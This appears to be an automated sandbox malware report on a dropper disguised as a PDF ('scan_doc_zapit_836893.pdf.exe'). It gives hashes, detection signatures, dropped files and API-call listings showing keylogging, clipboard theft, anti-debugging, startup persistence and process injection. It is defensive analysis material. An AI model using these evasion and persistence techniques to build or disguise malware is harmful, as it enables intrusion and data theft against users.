Windows Analysis Report
scan_doc_zapit_836893.pdf.exe

Overview

General Information

Sample name: scan_doc_zapit_836893.pdf.exe
Analysis ID: 1546130
MD5: cbcb0ff5aa471e22a6b129196a556d97
SHA1: b3dca2cac1624e6a8b318708c02376c1eb6ab784
SHA256: 5c1ce789a60371e388881ffbe0311bd2829e5e8dbaf77506929e50638f22d866
Infos:

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Sigma detected: Suspicious Double Extension File Execution
AI detected suspicious sample
Deletes itself after installation
Drops PE files with a suspicious file extension
Initial sample is a PE file and has a suspicious name
Sigma detected: WScript or CScript Dropper
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection
barindex
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 89.3% probability
Uses 32bit PE files
Source: scan_doc_zapit_836893.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: scan_doc_zapit_836893.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_00AE4005
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE494A GetFileAttributesW,FindFirstFileW,FindClose, 11_2_00AE494A
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_00AE3CE2
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 11_2_00AEC2FF
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 11_2_00AECD9F
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AECD14 FindFirstFileW,FindClose, 11_2_00AECD14
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_00AEF5D8
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_00AEF735
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 11_2_00AEFA36
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00764005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 17_2_00764005
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076494A GetFileAttributesW,FindFirstFileW,FindClose, 17_2_0076494A
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 17_2_0076C2FF
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076CD14 FindFirstFileW,FindClose, 17_2_0076CD14
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 17_2_0076CD9F
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 17_2_0076F5D8
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 17_2_0076F735
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 17_2_0076FA36
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00763CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 17_2_00763CE2
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\185027\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\185027 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.6:49744
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.6:49920
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown DNS traffic detected: query: EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu replaycode: Name error (3)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AF29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 11_2_00AF29BA
Source: global traffic DNS traffic detected: DNS query: EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://ocsp.digicert.com0
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://ocsp.digicert.com0A
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://ocsp.digicert.com0X
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmp, NanoCipher.scr, 00000011.00000000.2289726663.00000000007C9000.00000002.00000001.01000000.00000008.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: NanoCipher.scr.11.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: https://www.globalsign.com/repository/06
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050CD
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AF4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 11_2_00AF4830
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00774830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 17_2_00774830
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AF4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 11_2_00AF4632
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00B0D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 11_2_00B0D164
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0078D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 17_2_0078D164

System Summary
barindex
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: scan_doc_zapit_836893.pdf.exe
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE42D5: CreateFileW,DeviceIoControl,CloseHandle, 11_2_00AE42D5
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AD8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 11_2_00AD8F2E
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 11_2_00AE5778
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00765778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 17_2_00765778
Creates files inside the system directory
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe File created: C:\Windows\GccIncluded Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_0040497C 0_2_0040497C
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_00406ED2 0_2_00406ED2
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004074BB 0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A8B020 11_2_00A8B020
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A894E0 11_2_00A894E0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A89C80 11_2_00A89C80
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA23F5 11_2_00AA23F5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00B08400 11_2_00B08400
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AB6502 11_2_00AB6502
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A8E6F0 11_2_00A8E6F0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AB265E 11_2_00AB265E
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA282A 11_2_00AA282A
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AB89BF 11_2_00AB89BF
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00B00A3A 11_2_00B00A3A
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AB6A74 11_2_00AB6A74
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A90BE0 11_2_00A90BE0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00ADEDB2 11_2_00ADEDB2
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AACD51 11_2_00AACD51
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00B00EB7 11_2_00B00EB7
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE8E44 11_2_00AE8E44
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AB6FE6 11_2_00AB6FE6
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA33B7 11_2_00AA33B7
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AAF409 11_2_00AAF409
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A9D45D 11_2_00A9D45D
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A8F6A0 11_2_00A8F6A0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA16B4 11_2_00AA16B4
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A9F628 11_2_00A9F628
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A81663 11_2_00A81663
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA78C3 11_2_00AA78C3
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA1BA8 11_2_00AA1BA8
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AADBA5 11_2_00AADBA5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AB9CE5 11_2_00AB9CE5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A9DD28 11_2_00A9DD28
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA1FC0 11_2_00AA1FC0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AABFD6 11_2_00AABFD6
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0070B020 17_2_0070B020
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_007094E0 17_2_007094E0
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00709C80 17_2_00709C80
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_007223F5 17_2_007223F5
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00788400 17_2_00788400
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00736502 17_2_00736502
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0073265E 17_2_0073265E
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0070E6F0 17_2_0070E6F0
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0072282A 17_2_0072282A
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_007389BF 17_2_007389BF
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00736A74 17_2_00736A74
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00780A3A 17_2_00780A3A
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00710BE0 17_2_00710BE0
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0072CD51 17_2_0072CD51
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0075EDB2 17_2_0075EDB2
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00768E44 17_2_00768E44
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00780EB7 17_2_00780EB7
